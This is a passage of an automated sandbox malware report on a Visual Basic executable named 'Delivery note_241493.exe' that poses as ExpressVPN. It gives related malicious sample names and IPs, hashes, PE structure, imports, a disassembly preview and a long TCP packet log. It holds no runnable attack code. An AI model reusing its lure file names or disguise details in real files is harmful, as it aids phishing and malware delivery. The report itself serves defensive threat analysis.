                                xAXTvjBdeI.exeGet hashmaliciousBrowse
                                • 185.111.89.170
                                60rUtFJPFb.exeGet hashmaliciousBrowse
                                • 37.9.175.3
                                H0f7r2Mx4O.exeGet hashmaliciousBrowse
                                • 185.111.89.170
                                SHIPMENT DETAIL.xlsxGet hashmaliciousBrowse
                                • 37.9.175.9
                                B6i30pLa8e.exeGet hashmaliciousBrowse
                                • 37.9.175.155
                                O64Hou5qAF.exeGet hashmaliciousBrowse
                                • 185.111.89.170
                                RFQ - 001.xlsxGet hashmaliciousBrowse
                                • 185.111.89.170
                                e759c6e8_by_Libranalysis.exeGet hashmaliciousBrowse
                                • 185.111.89.170
                                diagram-32303288.xlsmGet hashmaliciousBrowse
                                • 37.9.175.7
                                diagram-32303288.xlsmGet hashmaliciousBrowse
                                • 37.9.175.7
                                diagram-1381837747.xlsmGet hashmaliciousBrowse
                                • 37.9.175.7
                                diagram-1381837747.xlsmGet hashmaliciousBrowse
                                • 37.9.175.7
                                New Order Euro 550,600.exeGet hashmaliciousBrowse
                                • 37.9.175.133
                                5PthEm83NG.exeGet hashmaliciousBrowse
                                • 185.111.89.170
                                k7AgZOwF4S.exeGet hashmaliciousBrowse
                                • 185.111.89.170
                                o52k2obPCG.exeGet hashmaliciousBrowse
                                • 185.111.89.170
                                NMpDBwHJP8.exeGet hashmaliciousBrowse
                                • 185.111.89.170

                                JA3 Fingerprints

                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                37f463bf4616ecd445d4a1937da06e19Delivery note_241493.exeGet hashmaliciousBrowse
                                • 172.217.168.46
                                • 172.217.18.97
                                FACTURA.exeGet hashmaliciousBrowse
                                • 172.217.168.46
                                • 172.217.18.97
                                REQUIREMENT.exeGet hashmaliciousBrowse
                                • 172.217.168.46
                                • 172.217.18.97
                                Statement of Account.exeGet hashmaliciousBrowse
                                • 172.217.168.46
                                • 172.217.18.97
                                HUD-Closing-Statement.htmlGet hashmaliciousBrowse
                                • 172.217.168.46
                                • 172.217.18.97
                                zrArDsoum0.exeGet hashmaliciousBrowse
                                • 172.217.168.46
                                • 172.217.18.97
                                Fra FAC-ES101-2107-03806.doc.exeGet hashmaliciousBrowse
                                • 172.217.168.46
                                • 172.217.18.97
                                correction HAWB.exeGet hashmaliciousBrowse
                                • 172.217.168.46
                                • 172.217.18.97
                                UZWdHg3hWA.exeGet hashmaliciousBrowse
                                • 172.217.168.46
                                • 172.217.18.97
                                LBJiq1QBaH.exeGet hashmaliciousBrowse
                                • 172.217.168.46
                                • 172.217.18.97
                                Statement of Account.exeGet hashmaliciousBrowse
                                • 172.217.168.46
                                • 172.217.18.97
                                ZAM#U00d3WIENIE.exeGet hashmaliciousBrowse
                                • 172.217.168.46
                                • 172.217.18.97
                                Potvrda narudzbe u prilogu.exeGet hashmaliciousBrowse
                                • 172.217.168.46
                                • 172.217.18.97
                                art-1881052385.xlsGet hashmaliciousBrowse
                                • 172.217.168.46
                                • 172.217.18.97
                                184285013-044310-sanlccjavap0003-7069_pdf (5).exeGet hashmaliciousBrowse
                                • 172.217.168.46
                                • 172.217.18.97
                                DOC 10132021.exeGet hashmaliciousBrowse
                                • 172.217.168.46
                                • 172.217.18.97
                                WIRE ADVICE.exeGet hashmaliciousBrowse
                                • 172.217.168.46
                                • 172.217.18.97
                                WireCopy.htmlGet hashmaliciousBrowse
                                • 172.217.168.46
                                • 172.217.18.97
                                UGS2021100716241.exeGet hashmaliciousBrowse
                                • 172.217.168.46
                                • 172.217.18.97
                                RFQ_Project 20211012 thyssenkrupp Industrial Solutions AG 6000358077_PDF.exeGet hashmaliciousBrowse
                                • 172.217.168.46
                                • 172.217.18.97

                                Dropped Files

                                No context

                                Created / dropped Files

                                \Device\ConDrv
                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):30
                                Entropy (8bit):3.964735178725505
                                Encrypted:false
                                SSDEEP:3:IBVFBWAGRHneyy:ITqAGRHner
                                MD5:9F754B47B351EF0FC32527B541420595
                                SHA1:006C66220B33E98C725B73495FE97B3291CE14D9
                                SHA-256:0219D77348D2F0510025E188D4EA84A8E73F856DEB5E0878D673079D05840591
                                SHA-512:C6996379BCB774CE27EEEC0F173CBACC70CA02F3A773DD879E3A42DA554535A94A9C13308D14E873C71A338105804AFFF32302558111EE880BA0C41747A08532
                                Malicious:false
                                Reputation:moderate, very likely benign file
                                Preview: NordVPN directory not found!..

                                Static File Info

                                General

                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                Entropy (8bit):5.765871666112805
                                TrID:
                                • Win32 Executable (generic) a (10002005/4) 99.15%
                                • Win32 Executable Microsoft Visual Basic 6 (82127/2) 0.81%
                                • Generic Win/DOS Executable (2004/3) 0.02%
                                • DOS Executable Generic (2002/1) 0.02%
                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                File name:Delivery note_241493.exe
                                File size:98304
                                MD5:261b89797cb2864afeb6f968106b42c9
                                SHA1:3a213afbd149f81b7727efa53f02a69bab52efed
                                SHA256:7c8515b78f74b188965d84c98cfed02aee2d242c5365bc04a7690705c8b5c743
                                SHA512:a84e2bcbba134d076595d03f2f2a5a79312c7021a392d9b76ccdad95da0c7c48450831d7f3ce6fbdc1eca3de7ed685c8296c5b5b6213954942feae385d186133
                                SSDEEP:1536:t3DDioJJrBe6nw1t9UX6wV7HmRC3Cf4D:t3ni63e6nw1neGgyf4
                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........i.......................*..............Rich....................PE..L.....1M.................@...0...............P....@........

                                File Icon

                                Icon Hash:69e1c892f664c884

                                Static PE Info

                                General

                                Entrypoint:0x4012b4
                                Entrypoint Section:.text
                                Digitally signed:false
                                Imagebase:0x400000
                                Subsystem:windows gui
                                Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                DLL Characteristics:
                                Time Stamp:0x4D31F5A3 [Sat Jan 15 19:29:39 2011 UTC]
                                TLS Callbacks:
                                CLR (.Net) Version:
                                OS Version Major:4
                                OS Version Minor:0
                                File Version Major:4
                                File Version Minor:0
                                Subsystem Version Major:4
                                Subsystem Version Minor:0
                                Import Hash:3d3cd1bd8dcc611a5734bf41f4e1a6a6

                                Entrypoint Preview

                                Instruction
                                push 00410204h
                                call 00007F631CC60453h
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                xor byte ptr [eax], al
                                add byte ptr [eax], al
                                cmp byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                sal ecx, cl
                                lds edi, fword ptr [edx+28h]
                                call 00007F6324855402h
                                arpl word ptr [edi], dx
                                sub eax, 0001C958h
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [ecx], al
                                add byte ptr [eax], al
                                add byte ptr [edi+69h], dl
                                je 00007F631CC604CBh
                                and byte ptr [ecx+6Ch], cl
                                outsb
                                popad
                                add byte ptr [eax], ah
                                and byte ptr [eax], al
                                add byte ptr [eax], al
                                add bh, bh
                                int3
                                xor dword ptr [eax], eax
                                cmp byte ptr [ecx+31h], bl
                                mov bl, 66h
                                mov dl, 49h
                                inc ebp
                                mov word ptr [esp+edi*8+225531F7h], seg?
                                insb
                                mov al, byte ptr [F5FC5CEDh]
                                lds ebx, fword ptr [edi-63DE7ABBh]
                                je 00007F631CC604D5h
                                push ecx
                                push ss
                                cmp edi, dword ptr [edx]
                                dec edi
                                lodsd
                                xor ebx, dword ptr [ecx-48EE309Ah]
                                or al, 00h
                                stosb
                                add byte ptr [eax-2Dh], ah
                                xchg eax, ebx
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                int ECh
                                add byte ptr [eax], al
                                sbb cl, byte ptr [ecx]
                                add byte ptr [eax], al
                                add byte ptr [706F4400h], cl
                                imul ebp, dword ptr [esi+67h], 666F7473h
                                jc 00000464h
                                or eax, 74000A01h
                                popad
                                insd
                                jo 00007F631CC604D1h
                                outsb
                                jc 00007F631CC604D1h

                                Data Directories

                                NameVirtual AddressVirtual Size Is in Section
                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_IMPORT0x13de40x28.text
                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x160000x1c1a.rsrc
                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x2300x20
                                IMAGE_DIRECTORY_ENTRY_IAT0x10000xf0.text
                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                Sections

                                NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                .text0x10000x131d80x14000False0.504833984375data6.22193919137IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                .data0x150000xcc40x1000False0.00634765625data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                .rsrc0x160000x1c1a0x2000False0.345581054688data3.68603696478IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                Resources

                                NameRVASizeTypeLanguageCountry
                                CUSTOM0x1791c0x2feMS Windows icon resource - 1 icon, 32x32, 16 colorsEnglishUnited States
                                CUSTOM0x1705e0x8beMS Windows icon resource - 1 icon, 32x32, 8 bits/pixelEnglishUnited States
                                CUSTOM0x16d600x2feMS Windows icon resource - 1 icon, 32x32, 16 colors, 4 bits/pixelEnglishUnited States
                                RT_ICON0x164b80x8a8data
                                RT_GROUP_ICON0x164a40x14data
                                RT_VERSION0x161a00x304dataEnglishUnited States

                                Imports

                                DLLImport
                                MSVBVM60.DLL_CIcos, _adj_fptan, __vbaVarMove, __vbaFreeVar, __vbaStrVarMove, __vbaFreeVarList, _adj_fdiv_m64, __vbaFreeObjList, _adj_fprem1, __vbaHresultCheckObj, _adj_fdiv_m32, __vbaObjSet, _adj_fdiv_m16i, __vbaObjSetAddref, _adj_fdivr_m16i, __vbaVarTstLt, _CIsin, __vbaChkstk, EVENT_SINK_AddRef, __vbaStrCmp, _adj_fpatan, __vbaLateIdCallLd, EVENT_SINK_Release, _CIsqrt, EVENT_SINK_QueryInterface, __vbaExceptHandler, _adj_fprem, _adj_fdivr_m64, __vbaFPException, _CIlog, __vbaNew2, _adj_fdiv_m32i, _adj_fdivr_m32i, _adj_fdivr_m32, _adj_fdiv_r, __vbaVarTstNe, __vbaVarAdd, __vbaVarDup, _CIatan, __vbaStrMove, _allmul, _CItan, _CIexp, __vbaFreeObj, __vbaFreeStr

                                Version Infos

                                DescriptionData
                                Translation0x0409 0x04b0
                                LegalCopyrightExpressVPN
                                InternalNameFAIRIES
                                FileVersion4.00
                                CompanyNameExpressVPN
                                LegalTrademarksExpressVPN
                                CommentsExpressVPN
                                ProductNameExpressVPN
                                ProductVersion4.00
                                FileDescriptionExpressVPN
                                OriginalFilenameFAIRIES.exe

                                Possible Origin

                                Language of compilation systemCountry where language is spokenMap
                                EnglishUnited States

                                Network Behavior

                                Network Port Distribution

                                TCP Packets

                                TimestampSource PortDest PortSource IPDest IP
                                Oct 13, 2021 16:54:49.012181997 CEST49773443192.168.11.20172.217.168.46
                                Oct 13, 2021 16:54:49.012254000 CEST44349773172.217.168.46192.168.11.20
                                Oct 13, 2021 16:54:49.012442112 CEST49773443192.168.11.20172.217.168.46
                                Oct 13, 2021 16:54:49.031769037 CEST49773443192.168.11.20172.217.168.46
                                Oct 13, 2021 16:54:49.031826973 CEST44349773172.217.168.46192.168.11.20
                                Oct 13, 2021 16:54:49.090781927 CEST44349773172.217.168.46192.168.11.20
                                Oct 13, 2021 16:54:49.090985060 CEST49773443192.168.11.20172.217.168.46
                                Oct 13, 2021 16:54:49.091037035 CEST49773443192.168.11.20172.217.168.46
                                Oct 13, 2021 16:54:49.093837023 CEST44349773172.217.168.46192.168.11.20
                                Oct 13, 2021 16:54:49.094151020 CEST49773443192.168.11.20172.217.168.46
                                Oct 13, 2021 16:54:49.207581043 CEST49773443192.168.11.20172.217.168.46
                                Oct 13, 2021 16:54:49.207637072 CEST44349773172.217.168.46192.168.11.20
                                Oct 13, 2021 16:54:49.208321095 CEST44349773172.217.168.46192.168.11.20
                                Oct 13, 2021 16:54:49.208479881 CEST49773443192.168.11.20172.217.168.46
                                Oct 13, 2021 16:54:49.211848021 CEST49773443192.168.11.20172.217.168.46
                                Oct 13, 2021 16:54:49.253938913 CEST44349773172.217.168.46192.168.11.20
                                Oct 13, 2021 16:54:49.542501926 CEST44349773172.217.168.46192.168.11.20
                                Oct 13, 2021 16:54:49.542526007 CEST44349773172.217.168.46192.168.11.20
                                Oct 13, 2021 16:54:49.542668104 CEST44349773172.217.168.46192.168.11.20
                                Oct 13, 2021 16:54:49.542809963 CEST49773443192.168.11.20172.217.168.46
                                Oct 13, 2021 16:54:49.542917967 CEST49773443192.168.11.20172.217.168.46
                                Oct 13, 2021 16:54:49.594114065 CEST49773443192.168.11.20172.217.168.46
                                Oct 13, 2021 16:54:49.594130993 CEST44349773172.217.168.46192.168.11.20
                                Oct 13, 2021 16:54:49.669876099 CEST49774443192.168.11.20172.217.18.97
                                Oct 13, 2021 16:54:49.669893026 CEST44349774172.217.18.97192.168.11.20
                                Oct 13, 2021 16:54:49.670104980 CEST49774443192.168.11.20172.217.18.97
                                Oct 13, 2021 16:54:49.670403004 CEST49774443192.168.11.20172.217.18.97
                                Oct 13, 2021 16:54:49.670413017 CEST44349774172.217.18.97192.168.11.20
                                Oct 13, 2021 16:54:49.709589958 CEST44349774172.217.18.97192.168.11.20
                                Oct 13, 2021 16:54:49.709806919 CEST49774443192.168.11.20172.217.18.97
                                Oct 13, 2021 16:54:49.709853888 CEST49774443192.168.11.20172.217.18.97
                                Oct 13, 2021 16:54:49.710267067 CEST44349774172.217.18.97192.168.11.20
                                Oct 13, 2021 16:54:49.710530043 CEST49774443192.168.11.20172.217.18.97
                                Oct 13, 2021 16:54:49.714044094 CEST49774443192.168.11.20172.217.18.97
                                Oct 13, 2021 16:54:49.714173079 CEST44349774172.217.18.97192.168.11.20
                                Oct 13, 2021 16:54:49.714289904 CEST49774443192.168.11.20172.217.18.97
                                Oct 13, 2021 16:54:49.714668036 CEST49774443192.168.11.20172.217.18.97
                                Oct 13, 2021 16:54:49.757898092 CEST44349774172.217.18.97192.168.11.20
                                Oct 13, 2021 16:54:49.940500975 CEST44349774172.217.18.97192.168.11.20
                                Oct 13, 2021 16:54:49.940697908 CEST49774443192.168.11.20172.217.18.97
                                Oct 13, 2021 16:54:49.941104889 CEST44349774172.217.18.97192.168.11.20
                                Oct 13, 2021 16:54:49.941307068 CEST49774443192.168.11.20172.217.18.97
                                Oct 13, 2021 16:54:49.941345930 CEST49774443192.168.11.20172.217.18.97
                                Oct 13, 2021 16:54:49.941818953 CEST44349774172.217.18.97192.168.11.20
                                Oct 13, 2021 16:54:49.942017078 CEST49774443192.168.11.20172.217.18.97
                                Oct 13, 2021 16:54:49.943120956 CEST44349774172.217.18.97192.168.11.20
                                Oct 13, 2021 16:54:49.943238020 CEST44349774172.217.18.97192.168.11.20
                                Oct 13, 2021 16:54:49.943280935 CEST49774443192.168.11.20172.217.18.97
                                Oct 13, 2021 16:54:49.943355083 CEST49774443192.168.11.20172.217.18.97
                                Oct 13, 2021 16:54:49.943386078 CEST44349774172.217.18.97192.168.11.20
                                Oct 13, 2021 16:54:49.943465948 CEST49774443192.168.11.20172.217.18.97
                                Oct 13, 2021 16:54:49.943519115 CEST49774443192.168.11.20172.217.18.97
                                Oct 13, 2021 16:54:49.943639040 CEST44349774172.217.18.97192.168.11.20
                                Oct 13, 2021 16:54:49.943828106 CEST49774443192.168.11.20172.217.18.97
                                Oct 13, 2021 16:54:49.944009066 CEST44349774172.217.18.97192.168.11.20
                                Oct 13, 2021 16:54:49.944588900 CEST49774443192.168.11.20172.217.18.97
                                Oct 13, 2021 16:54:49.950911045 CEST44349774172.217.18.97192.168.11.20
                                Oct 13, 2021 16:54:49.951181889 CEST44349774172.217.18.97192.168.11.20
                                Oct 13, 2021 16:54:49.951272964 CEST44349774172.217.18.97192.168.11.20
                                Oct 13, 2021 16:54:49.951471090 CEST49774443192.168.11.20172.217.18.97
                                Oct 13, 2021 16:54:49.951523066 CEST44349774172.217.18.97192.168.11.20
                                Oct 13, 2021 16:54:49.951596975 CEST49774443192.168.11.20172.217.18.97
                                Oct 13, 2021 16:54:49.951706886 CEST49774443192.168.11.20172.217.18.97
                                Oct 13, 2021 16:54:49.952003956 CEST44349774172.217.18.97192.168.11.20
                                Oct 13, 2021 16:54:49.952265024 CEST49774443192.168.11.20172.217.18.97
                                Oct 13, 2021 16:54:49.952318907 CEST44349774172.217.18.97192.168.11.20
                                Oct 13, 2021 16:54:49.952455044 CEST49774443192.168.11.20172.217.18.97
                                Oct 13, 2021 16:54:49.952743053 CEST44349774172.217.18.97192.168.11.20
                                Oct 13, 2021 16:54:49.952977896 CEST49774443192.168.11.20172.217.18.97
                                Oct 13, 2021 16:54:49.953027010 CEST44349774172.217.18.97192.168.11.20
                                Oct 13, 2021 16:54:49.953195095 CEST49774443192.168.11.20172.217.18.97
                                Oct 13, 2021 16:54:49.953423023 CEST44349774172.217.18.97192.168.11.20
                                Oct 13, 2021 16:54:49.953583002 CEST49774443192.168.11.20172.217.18.97
                                Oct 13, 2021 16:54:49.953612089 CEST44349774172.217.18.97192.168.11.20
                                Oct 13, 2021 16:54:49.953824043 CEST49774443192.168.11.20172.217.18.97
                                Oct 13, 2021 16:54:49.954086065 CEST44349774172.217.18.97192.168.11.20
                                Oct 13, 2021 16:54:49.954240084 CEST49774443192.168.11.20172.217.18.97
                                Oct 13, 2021 16:54:49.954269886 CEST44349774172.217.18.97192.168.11.20
                                Oct 13, 2021 16:54:49.954454899 CEST49774443192.168.11.20172.217.18.97
                                Oct 13, 2021 16:54:49.954693079 CEST44349774172.217.18.97192.168.11.20
                                Oct 13, 2021 16:54:49.954880953 CEST49774443192.168.11.20172.217.18.97
                                Oct 13, 2021 16:54:49.954930067 CEST44349774172.217.18.97192.168.11.20
                                Oct 13, 2021 16:54:49.955101967 CEST49774443192.168.11.20172.217.18.97
                                Oct 13, 2021 16:54:49.955514908 CEST44349774172.217.18.97192.168.11.20
                                Oct 13, 2021 16:54:49.955748081 CEST49774443192.168.11.20172.217.18.97
                                Oct 13, 2021 16:54:49.955787897 CEST44349774172.217.18.97192.168.11.20
                                Oct 13, 2021 16:54:49.956012011 CEST49774443192.168.11.20172.217.18.97
                                Oct 13, 2021 16:54:49.956141949 CEST44349774172.217.18.97192.168.11.20
                                Oct 13, 2021 16:54:49.956363916 CEST49774443192.168.11.20172.217.18.97
                                Oct 13, 2021 16:54:49.956402063 CEST44349774172.217.18.97192.168.11.20
                                Oct 13, 2021 16:54:49.956552029 CEST49774443192.168.11.20172.217.18.97
                                Oct 13, 2021 16:54:49.956737041 CEST44349774172.217.18.97192.168.11.20
                                Oct 13, 2021 16:54:49.956928968 CEST44349774172.217.18.97192.168.11.20
                                Oct 13, 2021 16:54:49.956989050 CEST49774443192.168.11.20172.217.18.97
                                Oct 13, 2021 16:54:49.957020998 CEST44349774172.217.18.97192.168.11.20
                                Oct 13, 2021 16:54:49.957144022 CEST49774443192.168.11.20172.217.18.97
                                Oct 13, 2021 16:54:49.957365036 CEST49774443192.168.11.20172.217.18.97
                                Oct 13, 2021 16:54:49.957725048 CEST44349774172.217.18.97192.168.11.20
                                Oct 13, 2021 16:54:49.957947969 CEST49774443192.168.11.20172.217.18.97
                                Oct 13, 2021 16:54:49.957981110 CEST44349774172.217.18.97192.168.11.20
                                Oct 13, 2021 16:54:49.958306074 CEST49774443192.168.11.20172.217.18.97
                                Oct 13, 2021 16:54:49.958337069 CEST44349774172.217.18.97192.168.11.20
                                Oct 13, 2021 16:54:49.958605051 CEST49774443192.168.11.20172.217.18.97
                                Oct 13, 2021 16:54:49.958812952 CEST44349774172.217.18.97192.168.11.20
                                Oct 13, 2021 16:54:49.958961964 CEST49774443192.168.11.20172.217.18.97
                                Oct 13, 2021 16:54:49.958991051 CEST44349774172.217.18.97192.168.11.20
                                Oct 13, 2021 16:54:49.959158897 CEST49774443192.168.11.20172.217.18.97
                                Oct 13, 2021 16:54:49.959189892 CEST44349774172.217.18.97192.168.11.20
                                Oct 13, 2021 16:54:49.959335089 CEST49774443192.168.11.20172.217.18.97
                                Oct 13, 2021 16:54:49.959654093 CEST44349774172.217.18.97192.168.11.20
                                Oct 13, 2021 16:54:49.959882021 CEST49774443192.168.11.20172.217.18.97
                                Oct 13, 2021 16:54:49.959904909 CEST44349774172.217.18.97192.168.11.20
                                Oct 13, 2021 16:54:49.959922075 CEST44349774172.217.18.97192.168.11.20
                                Oct 13, 2021 16:54:49.960033894 CEST49774443192.168.11.20172.217.18.97
                                Oct 13, 2021 16:54:49.960052967 CEST49774443192.168.11.20172.217.18.97
                                Oct 13, 2021 16:54:49.961447001 CEST44349774172.217.18.97192.168.11.20
                                Oct 13, 2021 16:54:49.961636066 CEST49774443192.168.11.20172.217.18.97
                                Oct 13, 2021 16:54:49.961673975 CEST44349774172.217.18.97192.168.11.20
                                Oct 13, 2021 16:54:49.961826086 CEST49774443192.168.11.20172.217.18.97
                                Oct 13, 2021 16:54:49.961874962 CEST44349774172.217.18.97192.168.11.20
                                Oct 13, 2021 16:54:49.962075949 CEST49774443192.168.11.20172.217.18.97
                                Oct 13, 2021 16:54:49.962109089 CEST44349774172.217.18.97192.168.11.20
                                Oct 13, 2021 16:54:49.962229013 CEST44349774172.217.18.97192.168.11.20
                                Oct 13, 2021 16:54:49.962291002 CEST49774443192.168.11.20172.217.18.97
                                Oct 13, 2021 16:54:49.962317944 CEST44349774172.217.18.97192.168.11.20
                                Oct 13, 2021 16:54:49.962404966 CEST49774443192.168.11.20172.217.18.97
                                Oct 13, 2021 16:54:49.962482929 CEST49774443192.168.11.20172.217.18.97
                                Oct 13, 2021 16:54:49.962516069 CEST44349774172.217.18.97192.168.11.20
                                Oct 13, 2021 16:54:49.962735891 CEST49774443192.168.11.20172.217.18.97
                                Oct 13, 2021 16:54:49.962776899 CEST44349774172.217.18.97192.168.11.20
                                Oct 13, 2021 16:54:49.962922096 CEST49774443192.168.11.20172.217.18.97
                                Oct 13, 2021 16:54:49.962949991 CEST44349774172.217.18.97192.168.11.20
                                Oct 13, 2021 16:54:49.963196993 CEST49774443192.168.11.20172.217.18.97
                                Oct 13, 2021 16:54:49.963227987 CEST44349774172.217.18.97192.168.11.20
                                Oct 13, 2021 16:54:49.963418961 CEST49774443192.168.11.20172.217.18.97
                                Oct 13, 2021 16:54:49.963464022 CEST44349774172.217.18.97192.168.11.20
                                Oct 13, 2021 16:54:49.963680983 CEST49774443192.168.11.20172.217.18.97
                                Oct 13, 2021 16:54:49.963718891 CEST44349774172.217.18.97192.168.11.20
                                Oct 13, 2021 16:54:49.963845015 CEST44349774172.217.18.97192.168.11.20
                                Oct 13, 2021 16:54:49.964023113 CEST49774443192.168.11.20172.217.18.97
                                Oct 13, 2021 16:54:49.964059114 CEST44349774172.217.18.97192.168.11.20
                                Oct 13, 2021 16:54:49.964140892 CEST49774443192.168.11.20172.217.18.97
                                Oct 13, 2021 16:54:49.964462042 CEST44349774172.217.18.97192.168.11.20
                                Oct 13, 2021 16:54:49.964481115 CEST49774443192.168.11.20172.217.18.97
                                Oct 13, 2021 16:54:49.964517117 CEST44349774172.217.18.97192.168.11.20
                                Oct 13, 2021 16:54:49.964678049 CEST49774443192.168.11.20172.217.18.97
                                Oct 13, 2021 16:54:49.964729071 CEST49774443192.168.11.20172.217.18.97
                                Oct 13, 2021 16:54:49.964750051 CEST44349774172.217.18.97192.168.11.20
                                Oct 13, 2021 16:54:49.965006113 CEST49774443192.168.11.20172.217.18.97
                                Oct 13, 2021 16:54:49.965044975 CEST44349774172.217.18.97192.168.11.20
                                Oct 13, 2021 16:54:49.965322971 CEST49774443192.168.11.20172.217.18.97
                                Oct 13, 2021 16:54:49.965363979 CEST44349774172.217.18.97192.168.11.20
                                Oct 13, 2021 16:54:49.965517044 CEST49774443192.168.11.20172.217.18.97
                                Oct 13, 2021 16:54:49.965604067 CEST44349774172.217.18.97192.168.11.20
                                Oct 13, 2021 16:54:49.965748072 CEST49774443192.168.11.20172.217.18.97
                                Oct 13, 2021 16:54:49.965781927 CEST44349774172.217.18.97192.168.11.20
                                Oct 13, 2021 16:54:49.965962887 CEST49774443192.168.11.20172.217.18.97
                                Oct 13, 2021 16:54:49.965992928 CEST44349774172.217.18.97192.168.11.20
                                Oct 13, 2021 16:54:49.966137886 CEST49774443192.168.11.20172.217.18.97
                                Oct 13, 2021 16:54:49.966172934 CEST44349774172.217.18.97192.168.11.20
                                Oct 13, 2021 16:54:49.966342926 CEST49774443192.168.11.20172.217.18.97
                                Oct 13, 2021 16:54:49.966460943 CEST44349774172.217.18.97192.168.11.20
                                Oct 13, 2021 16:54:49.966624975 CEST49774443192.168.11.20172.217.18.97
                                Oct 13, 2021 16:54:49.966662884 CEST44349774172.217.18.97192.168.11.20
                                Oct 13, 2021 16:54:49.966809988 CEST49774443192.168.11.20172.217.18.97
                                Oct 13, 2021 16:54:49.966840982 CEST44349774172.217.18.97192.168.11.20
                                Oct 13, 2021 16:54:49.966990948 CEST49774443192.168.11.20172.217.18.97
                                Oct 13, 2021 16:54:49.967015982 CEST44349774172.217.18.97192.168.11.20
                                Oct 13, 2021 16:54:49.967222929 CEST49774443192.168.11.20172.217.18.97
                                Oct 13, 2021 16:54:49.967394114 CEST44349774172.217.18.97192.168.11.20
                                Oct 13, 2021 16:54:49.967552900 CEST49774443192.168.11.20172.217.18.97
                                Oct 13, 2021 16:54:49.967593908 CEST44349774172.217.18.97192.168.11.20
                                Oct 13, 2021 16:54:49.967737913 CEST49774443192.168.11.20172.217.18.97
                                Oct 13, 2021 16:54:49.967767000 CEST44349774172.217.18.97192.168.11.20
                                Oct 13, 2021 16:54:49.967910051 CEST49774443192.168.11.20172.217.18.97
                                Oct 13, 2021 16:54:49.967935085 CEST44349774172.217.18.97192.168.11.20
                                Oct 13, 2021 16:54:49.968080997 CEST49774443192.168.11.20172.217.18.97
                                Oct 13, 2021 16:54:49.968261003 CEST44349774172.217.18.97192.168.11.20
                                Oct 13, 2021 16:54:49.968422890 CEST49774443192.168.11.20172.217.18.97
                                Oct 13, 2021 16:54:49.968458891 CEST44349774172.217.18.97192.168.11.20
                                Oct 13, 2021 16:54:49.968600988 CEST49774443192.168.11.20172.217.18.97
                                Oct 13, 2021 16:54:49.968631029 CEST44349774172.217.18.97192.168.11.20
                                Oct 13, 2021 16:54:49.968770981 CEST44349774172.217.18.97192.168.11.20
                                Oct 13, 2021 16:54:49.968873024 CEST49774443192.168.11.20172.217.18.97
                                Oct 13, 2021 16:54:49.968905926 CEST44349774172.217.18.97192.168.11.20
                                Oct 13, 2021 16:54:49.968924999 CEST49774443192.168.11.20172.217.18.97
                                Oct 13, 2021 16:54:49.969053984 CEST49774443192.168.11.20172.217.18.97
                                Oct 13, 2021 16:54:49.969239950 CEST44349774172.217.18.97192.168.11.20
                                Oct 13, 2021 16:54:49.969405890 CEST49774443192.168.11.20172.217.18.97
                                Oct 13, 2021 16:54:49.969443083 CEST44349774172.217.18.97192.168.11.20
                                Oct 13, 2021 16:54:49.969624996 CEST44349774172.217.18.97192.168.11.20
                                Oct 13, 2021 16:54:49.969635963 CEST49774443192.168.11.20172.217.18.97
                                Oct 13, 2021 16:54:49.969660997 CEST44349774172.217.18.97192.168.11.20
                                Oct 13, 2021 16:54:49.969934940 CEST49774443192.168.11.20172.217.18.97
                                Oct 13, 2021 16:54:49.970113993 CEST44349774172.217.18.97192.168.11.20
                                Oct 13, 2021 16:54:49.970340967 CEST49774443192.168.11.20172.217.18.97
                                Oct 13, 2021 16:54:49.970376968 CEST44349774172.217.18.97192.168.11.20
                                Oct 13, 2021 16:54:49.970531940 CEST44349774172.217.18.97192.168.11.20
                                Oct 13, 2021 16:54:49.970592022 CEST49774443192.168.11.20172.217.18.97
                                Oct 13, 2021 16:54:49.970619917 CEST44349774172.217.18.97192.168.11.20
                                Oct 13, 2021 16:54:49.970769882 CEST49774443192.168.11.20172.217.18.97
                                Oct 13, 2021 16:54:49.970817089 CEST49774443192.168.11.20172.217.18.97
